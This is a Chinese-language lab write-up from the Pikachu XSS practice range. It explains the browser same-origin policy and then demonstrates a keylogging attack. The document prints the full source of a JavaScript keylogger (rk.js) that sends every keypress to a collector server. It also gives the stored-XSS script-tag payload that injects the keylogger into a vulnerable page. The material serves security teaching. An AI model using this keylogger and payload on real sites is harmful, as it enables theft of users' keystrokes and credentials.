Pikachu-xss实验案例-键盘记录
一、跨域:
二、跨域-同源策略
同源策略(Same Origin Policy)是一种约定,它是浏览器最核心也是最基本的安全功能。同源策略会阻止一个域的javascrip脚本和另一个域的内容进行交互,是用于隔离潜在恶意文件的关键安全机制;关于这一点我们后面会举例说明。如果缺少了同源策略浏览器的安全使用会受到很大的影响。可以说web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。
1、同源的定义
当一个请求url的协议、域名、端口三者之间任意一个与当前页面url不同即为跨域。
如下表给出了相对http://www.example.com/dir/page.html的同源检测示例:
| URL | 结果 | 原因 |
|---|---|---|
http://www.example.com/dir2/other.html | 成功 | 协议、域名、端口相同 |
http://www.example.com/dir/inner/another.html | 成功 | 协议、域名、端口相同 |
https://www.example.com/secure.html | 失败 | 协议不同 ( HTTPS ) |
http://www.example.com:81/dir/etc.html | 失败 | 端口不同 ( 81 ) |
http://news.example.com/dir/other.html | 失败 | 域名不同 |
跨域:同源策略
三、为什么需要同源策略
键盘记录实验:
查看源代码,rkserver.php 开启同源策略,所以允许别的域来访问;同时把所有来的数据,插入到数据库
rk.js 脚本是攻击代码,把它放到站点上,通过有xss漏洞的页面去调用,运行起来后,对用户的数据进行获取,异步发送到后台;
/** * Created by runner on 2018/7/8. */ function createAjax(){ var request=false; if(window.XMLHttpRequest){ request=new XMLHttpRequest();if(request.overrideMimeType){request.overrideMimeType("text/xml");}}else if(window.ActiveXObject){var versions=['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i<versions.length; i++){try{request=new ActiveXObject(versions[i]);if(request){return request;}}catch(e){request=false;}}}return request;
}var ajax=null;
var xl="datax=";function onkeypress() {var realkey = String.fromCharCode(event.keyCode);xl+=realkey;show();
}document.onkeypress = onkeypress;function show() {ajax = createAjax();ajax.onreadystatechange = function () {if (ajax.readyState == 4) {if (ajax.status == 200) {var data = ajax.responseText;} else {alert("页面请求失败");}}}var postdate = xl;ajax.open("POST", "http://192.168.1.15/pkxss/rkeypress/rkserver.php",true);ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");ajax.setRequestHeader("Content-length", postdate.length);ajax.setRequestHeader("Connection", "close");ajax.send(postdate);
}root@186ebf050c71:/var/www/html/pkxss/rkeypress# vi rk.js
root@186ebf050c71:/var/www/html/pkxss/rkeypress# cat rk.js
/*** Created by runner on 2018/7/8.*/function createAjax(){var request=false;if(window.XMLHttpRequest){request=new XMLHttpRequest();if(request.overrideMimeType){request.overrideMimeType("text/xml");}}else if(window.ActiveXObject){var versions=['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i<versions.length; i++){try{request=new ActiveXObject(versions[i]);if(request){return request;}}catch(e){request=false;}}}return request;
}var ajax=null;
var xl="datax=";function onkeypress() {var realkey = String.fromCharCode(event.keyCode);xl+=realkey;show();
}document.onkeypress = onkeypress;function show() {ajax = createAjax();ajax.onreadystatechange = function () {if (ajax.readyState == 4) {if (ajax.status == 200) {var data = ajax.responseText;} else {alert("页面请求失败");}}}var postdate = xl;ajax.open("POST", "http://192.168.3.224:8082/pkxss/rkeypress/rkserver.php",true);ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");ajax.setRequestHeader("Content-length", postdate.length);ajax.setRequestHeader("Connection", "close");ajax.send(postdate);
}
因此,在有存储型xss漏洞的页面,嵌入rk.js 页面;让他运行起来;
构造payload,让rk.js 加载到页面里;
<script src="http://192.168.3.224:8082/pkxss/rkeypress/rk.js"></script>加载完成后,进入pkxss后台, 输入都会被获取到。
随便输入,可以看到不断的发送ajax 类型的异步请求。(xhr 代表ajax请求,请求源就是 rk.js)
